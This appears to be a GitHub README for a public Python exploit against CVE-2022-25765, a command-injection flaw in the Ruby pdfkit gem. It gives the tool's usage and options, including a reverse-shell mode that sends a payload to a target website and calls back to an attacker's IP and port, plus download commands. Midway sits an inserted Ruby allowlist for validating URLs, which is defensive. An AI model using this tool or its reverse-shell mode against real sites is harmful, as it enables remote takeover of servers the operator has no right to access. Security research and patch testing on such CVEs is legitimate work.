UNICORDev/exploit-CVE-2022-25765

Exploit for CVE-2022-25765 (pdfkit) - Command Injection

Like this repo? Give us a ⭐!

For educational and authorized security research purposes only.

Exploit Author

@UNICORDev (by @NicPWNs and @Dev-Yeoj)

Vulnerability Description

The pdfkit package, from version 0.0.0 onward, is vulnerable to command injection because the URL it is given is not properly sanitized.

Exploit Description

The Ruby gem pdfkit is commonly used to convert websites or HTML to PDF documents. Vulnerable versions (< 0.8.7.2) of this software can be passed a specially crafted URL containing a command that will be executed. This exploit generates such URLs, or sends them to a vulnerable website running pdfkit.
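Added example, not part of this repository: a strict allowlist check, in Ruby, that an application calling the pdfkit gem can apply to user-supplied URLs before rendering, so that a crafted URL of the kind described above is refused. The function name `safe_pdfkit_url` and the regexes are assumptions; upgrading to pdfkit >= 0.8.7.2 remains the real fix.

```ruby
# Defensive allowlist for URLs handed to pdfkit (hypothetical helper, not
# pdfkit's own API). Deliberately strict: only http/https, a DNS hostname
# (no IP literals, no userinfo), and a narrow character set in path/query.
require "uri"

# RFC 1123-style labels followed by an alphabetic TLD.
HOST_RE = /\A(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+[a-z]{2,63}\z/i
# Characters permitted in the path and query of a URL we will render.
SAFE_PQ_RE = %r{\A[A-Za-z0-9\-._~/?&=%+:@]*\z}

# Returns the normalised URL string if it is safe to render, otherwise nil.
def safe_pdfkit_url(input)
  return nil unless input.is_a?(String) && input.length <= 2048
  # Whitespace, quotes and shell metacharacters never belong in a render URL.
  return nil if input.match?(/[\s`$;|&<>()'"\\]/)
  uri = URI.parse(input)
  return nil unless %w[http https].include?(uri.scheme)
  return nil unless uri.host && HOST_RE.match?(uri.host)
  return nil unless uri.userinfo.nil?
  return nil unless SAFE_PQ_RE.match?(uri.path.to_s) && SAFE_PQ_RE.match?(uri.query.to_s)
  uri.to_s
rescue URI::InvalidURIError
  nil
end

# Example call site (constructed): only a validated URL reaches pdfkit.
def render_if_safe(input)
  url = safe_pdfkit_url(input)
  return :rejected if url.nil?
  # PDFKit.new(url).to_pdf would go here in a real application.
  :rendered
end
```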

Usage

  python3 exploit-CVE-2022-25765.py -c <command>
  python3 exploit-CVE-2022-25765.py -s <local-IP> <local-port>
  python3 exploit-CVE-2022-25765.py -c <command> [-w <http://target.com/index.html> -p <parameter>]
  python3 exploit-CVE-2022-25765.py -s <local-IP> <local-port> [-w <http://target.com/index.html> -p <parameter>]
  python3 exploit-CVE-2022-25765.py -h

Options

  -c    Custom command mode. Provide command to generate custom payload with.
  -s    Reverse shell mode. Provide local IP and port to generate reverse shell payload with.
  -w    URL of website running vulnerable pdfkit. (Optional)
  -p    POST parameter on website running vulnerable pdfkit. (Optional)
  -h    Show this help menu.

Download

Download exploit-CVE-2022-25765.py from GitHub

Download exploit-CVE-2022-25765.py from ExploitDB

Searchsploit (ExploitDB)

searchsploit -u
searchsploit -m 51293

Exploit Requirements

  • python3
  • python3:requests
  • python3:urllib3

Demo

Custom Command Mode

(demo recording: cropped command)

Reverse Shell Sent to Target Website Mode

(demo recording: exploit-CVE-2022-25765)

Tested On

pdfkit Version 0.8.6

Applies To

pdfkit Versions < 0.8.7.2

Test Environment

gem install pdfkit -v 0.8.6

Credits